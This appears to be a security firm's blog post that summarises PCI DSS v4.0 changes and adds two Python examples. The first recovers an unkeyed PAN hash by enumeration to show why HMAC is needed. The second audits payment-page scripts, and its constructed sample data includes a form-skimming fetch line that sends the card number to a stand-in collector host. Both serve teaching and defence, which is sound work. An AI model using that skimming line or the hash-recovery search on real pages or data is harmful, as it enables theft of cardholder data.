FoxPointe Security Hub

Changes Associated with v4.0 of the PCI Standard


In March 2022, the PCI Security Standards Council (PCI SSC) released v4.0 of the PCI Data Security Standard (PCI DSS). Version 3.2.1 remains valid until 31 March 2024, and most of the new v4.0 requirements are best practices until 31 March 2025, after which they become mandatory. The following changes are among those most likely to affect merchants and service providers:

  • For merchants, sensitive authentication data (SAD), if stored outside volatile memory, must be encrypted using strong cryptography prior to authorization. Once authorization is achieved, said data must be securely deleted.
  • When using remote access technologies, technical safeguards must be in place to limit the movement of cardholder data (i.e., copying and/or relocation of data).
  • If an organization stores hashed PAN, the hash must be a keyed cryptographic hash of the entire PAN (a cryptographic key combined with a hash function, such as an HMAC), so that the hash cannot be reversed by brute-forcing the relatively small PAN space.
  • Disk-level or partition-level encryption may only be used on its own to render PAN unreadable on removable electronic media; on non-removable media it must be combined with another mechanism that also renders the PAN unreadable.
  • Different cryptographic keys must be used in the production and test environments (service providers must document their cryptographic architecture, including how this separation is enforced).
  • Certificates used to safeguard PAN during transmission over open, public networks must be confirmed as valid and cannot be expired or revoked.
  • An inventory of trusted keys and certificates used to protect PAN data during transmission must be maintained.
  • For public-facing web applications, an automated technical solution must be deployed that continually detects and prevents web-based attacks (no longer allowing for periodic manual reviews).
  • All payment page scripts that are loaded and executed in the consumer’s browser must be managed as follows:
    • A method is implemented to confirm that each script is authorized.
    • A method is implemented to assure the integrity of each script.
    • An inventory of all scripts is maintained with written justification as to why each is necessary.
  • Organizations must implement mechanisms (technical controls and personnel training) to detect and protect personnel against phishing attacks.
  • Removable electronic media must be scanned by the anti-malware solution (or have its behavior continuously analyzed) when inserted, connected, or logically mounted.
  • All user accounts and related access privileges (including third-party and vendor accounts) must be reviewed at least once every six months; access by application and system accounts must be reviewed at a frequency set by a targeted risk analysis.
  • Password/passphrase minimum length must be 12 characters (or 8 characters where the system does not support 12).
  • Credentials used by applications and system accounts cannot be hard coded into scripts, source code, or executable code.
  • Passwords/passphrases for application and system accounts must be changed periodically.
  • Passwords/passphrases for application and system accounts must meet complexity requirements based on risk.
  • Automated mechanisms for review of audit logs must be required (manual reviews will not be accepted).
  • Authenticated internal vulnerability scans must be required for all internal devices within the CDE.
  • Change and tamper detection mechanisms must be implemented to identify unauthorized changes on payment pages.
  • Organizations must implement response procedures to be initiated upon detection of cleartext PAN data found outside of the CDE.
  • Organizations must implement response procedures to be initiated upon the detection of attempts to remove cleartext PAN from the CDE via an unauthorized channel, method, or process.
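To show why the keyed-hash requirement matters, here is an added example (not code from the original page or from the PCI SSC) contrasting a plain SHA-256 of a PAN with an HMAC-SHA256 over the entire PAN. The sample PAN is a constructed, Luhn-valid test number, the HMAC key is generated in the script, and the attacker model is an assumption: someone who obtains the hash table and also sees the truncated form (first six and last four digits) that is permitted for display, which leaves only six digits to enumerate.

```python
"""Keyed vs. unkeyed hashing of a PAN.

Added example: shows how an unkeyed hash of a PAN can be reversed by
enumeration when the attacker also knows the truncated PAN, and why an
HMAC over the entire PAN (PCI DSS v4.0 requirement 3.5.1.1) closes the gap.
"""
import hashlib
import hmac
import secrets
from typing import Callable, Optional

# Constructed test PAN (a well-known Luhn-valid test number, not real cardholder data).
SAMPLE_PAN = "4111111111111111"


def luhn_ok(pan: str) -> bool:
    """Luhn check-digit validation. An attacker uses it to discard ~90% of candidates."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def unkeyed_hash(pan: str) -> str:
    """A plain SHA-256 of the PAN: common under v3.2.1, no longer acceptable under v4.0."""
    return hashlib.sha256(pan.encode("ascii")).hexdigest()


def keyed_hash(pan: str, key: bytes) -> str:
    """HMAC-SHA256 over the entire PAN. The key must be generated, stored and
    rotated like an encryption key (PCI DSS 3.6/3.7), never alongside the hashes."""
    if len(key) < 32:
        raise ValueError("HMAC key must be at least 256 bits")
    return hmac.new(key, pan.encode("ascii"), hashlib.sha256).hexdigest()


def recover_pan(target: str, first6: str, last4: str,
                hash_fn: Callable[[str], str], max_candidates: int = 10**6) -> Optional[str]:
    """Attacker's search for a 16-digit PAN. The first six and last four digits
    are assumed known from a truncated PAN stored or displayed next to the hash,
    so only the six middle digits (10**6 values, ~10**5 after Luhn) are unknown."""
    if len(first6) != 6 or len(last4) != 4:
        raise ValueError("expects the first six and last four digits of a 16-digit PAN")
    for middle in range(min(max_candidates, 10**6)):
        candidate = f"{first6}{middle:06d}{last4}"
        if luhn_ok(candidate) and hash_fn(candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    first6, last4 = SAMPLE_PAN[:6], SAMPLE_PAN[-4:]

    # Unkeyed: the hash plus the truncated PAN gives the full PAN back in seconds.
    print("unkeyed:", recover_pan(unkeyed_hash(SAMPLE_PAN), first6, last4, unkeyed_hash))
    # Keyed: without the key the attacker can only try functions they can compute,
    # so the same search over the HMAC digest finds nothing.
    print("keyed:  ", recover_pan(keyed_hash(SAMPLE_PAN, key), first6, last4, unkeyed_hash))
```

The search works because the hash and the truncated PAN are stored for the same card, which is exactly the correlation v4.0 warns about; the HMAC removes the attacker's ability to compute candidate digests at all. Two practical consequences follow: the HMAC key belongs in an HSM or key-management service, not in the database or application config next to the hashes, and rotating that key means re-hashing every stored PAN, so the rotation procedure has to be planned before the first hash is written.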
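As an added example for the payment-page script management and tamper-detection bullets above (not code from the page or from any PCI SSC guidance), the following Python audits a payment page against a script inventory: it parses the page's script tags, computes Subresource Integrity (SRI) digests of the content actually served, and reports scripts that are unauthorized, altered since they were inventoried, or loaded without a browser-enforced integrity attribute. The inventory entries, the script bodies, the page markup and all hostnames are constructed for the example; in practice the served content would be fetched by a monitor running outside the page itself.

```python
"""Payment-page script inventory and integrity audit (added example, not from the page)."""
import base64
import hashlib
from html.parser import HTMLParser
from typing import Dict, List, Tuple


def sri_hash(content: bytes) -> str:
    """Subresource Integrity digest in the form a browser accepts in the integrity attribute."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode("ascii")


# --- Constructed data standing in for the real inventory and a fetched page ---
CHECKOUT_JS = b"document.getElementById('pan').addEventListener('input', maskPan);"
FRAUD_JS = b"window.fraudSignals = collectSignals();"
INLINE_INIT = "initCheckout({currency: 'USD'});"

# Inventory required by 6.4.3: every script, its expected digest, and why it is needed.
INVENTORY: Dict[str, Dict[str, str]] = {
    "https://pay.example.com/js/checkout.js": {
        "integrity": sri_hash(CHECKOUT_JS),
        "justification": "Renders and validates the card entry form"},
    "https://fraud.example-vendor.com/fp.js": {
        "integrity": sri_hash(FRAUD_JS),
        "justification": "Device fingerprinting required by the acquirer's fraud service"},
    "inline:" + sri_hash(INLINE_INIT.encode()): {
        "integrity": sri_hash(INLINE_INIT.encode()),
        "justification": "Bootstraps checkout.js with page parameters"},
}

# Constructed snapshot of what the page serves today: fp.js has been modified at
# the vendor and a script nobody approved has appeared (the usual skimming pattern).
SERVED: Dict[str, bytes] = {
    "https://pay.example.com/js/checkout.js": CHECKOUT_JS,
    "https://fraud.example-vendor.com/fp.js": FRAUD_JS
        + b"\nfetch('https://collector.example.net/?d=' + btoa(document.forms[0].pan.value));",
    "https://cdn.example.org/libs/skim.js": b"/* exfiltrates form fields */",
}

PAGE_HTML = f"""<html><body>
<script src="https://pay.example.com/js/checkout.js" integrity="{sri_hash(CHECKOUT_JS)}" crossorigin="anonymous"></script>
<script src="https://fraud.example-vendor.com/fp.js"></script>
<script src="https://cdn.example.org/libs/skim.js"></script>
<script>{INLINE_INIT}</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collects external script tags (src and integrity attribute) and inline script bodies."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[Tuple[str, str]] = []
        self.inline: List[str] = []
        self._in_inline = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity") or ""))
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf).strip())
            self._in_inline = False


def audit_payment_page(html: str, served: Dict[str, bytes],
                       inventory: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """Returns (finding, subject) pairs; an empty list means the page matches the inventory."""
    parser = ScriptCollector()
    parser.feed(html)
    findings: List[Tuple[str, str]] = []
    for src, integrity_attr in parser.external:
        entry = inventory.get(src)
        if entry is None:
            findings.append(("UNAUTHORIZED", src))      # 6.4.3: not in the approved inventory
            continue
        if sri_hash(served.get(src, b"")) != entry["integrity"]:
            findings.append(("TAMPERED", src))          # 11.6.1: served content changed
        if not integrity_attr:
            findings.append(("NO_SRI", src))            # browser will not enforce integrity
        elif integrity_attr != entry["integrity"]:
            findings.append(("SRI_MISMATCH", src))      # tag pins a digest the inventory never approved
    for body in parser.inline:
        if "inline:" + sri_hash(body.encode()) not in inventory:
            findings.append(("UNAUTHORIZED", "inline:" + body[:40]))
    return findings


if __name__ == "__main__":
    for finding, subject in audit_payment_page(PAGE_HTML, SERVED, INVENTORY):
        print(f"{finding:13} {subject}")
```

Running the audit against the constructed page flags fp.js twice (its content no longer matches the inventoried digest, and the tag carries no integrity attribute, so the browser would have loaded the altered file anyway) and flags skim.js as unauthorized, while checkout.js and the inventoried inline block pass. SRI alone is not enough for 6.4.3 and 11.6.1: a script that changes legitimately every release still needs its new digest approved and recorded with a justification, and a Content Security Policy restricting script sources is the usual complementary control for anything the page cannot pin.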

The items listed above are not a complete list of the changes, but each can carry a significant implementation cost for many organizations. For the full requirements and the implementation timeline, refer to the PCI SSC website at https://www.pcisecuritystandards.org/.